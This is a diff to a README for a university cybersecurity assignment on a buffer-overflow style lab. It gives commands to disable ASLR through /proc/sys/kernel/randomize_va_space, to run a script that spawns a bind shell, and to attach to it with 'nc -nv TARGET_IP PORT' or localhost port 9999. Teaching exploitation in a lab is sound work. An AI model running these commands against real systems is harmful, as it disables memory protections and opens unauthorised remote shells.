pkitsos/ECE529_Cybersecurity/assign7_kitsos/README.md

 ## Instructions

 Turn ASLR off so address env variable address doesn't change
-<br/>Command: sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
+Command: sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
 NOTE: 0 - disables randomization and 2 - enables randomization

 Spawn a bind shell by running the run.sh script
-<br/>Command: sh run.sh
+Command: sh run.sh

 NOTE: The memory addresses used for the attack are encoded in little endian and may require some tweaking.
 Specifically, the estimated payload address should match that of PAY_ADDR defined in run.sh, otherwise it needs to be found using GDB.

 To attach to the bind shell from the attack machine, open a terminal and run the following command using the IP of the target machine and port number of the nc server.
-<br/>Command: nc -nv TARGET_IP PORT
+Command: nc -nv TARGET_IP PORT

-For this example, use the following command to connect via a second terminal on the same machine over port 9999
+For this example, use the following command to connect via a second terminal on the same machine over port 9999.
-<br/>Command: nc -nv 127.0.0.1 9999
+Command: nc -nv 127.0.0.1 9999

+To verify the bind shell is operational, test with commands like whoami, pwd, and ls.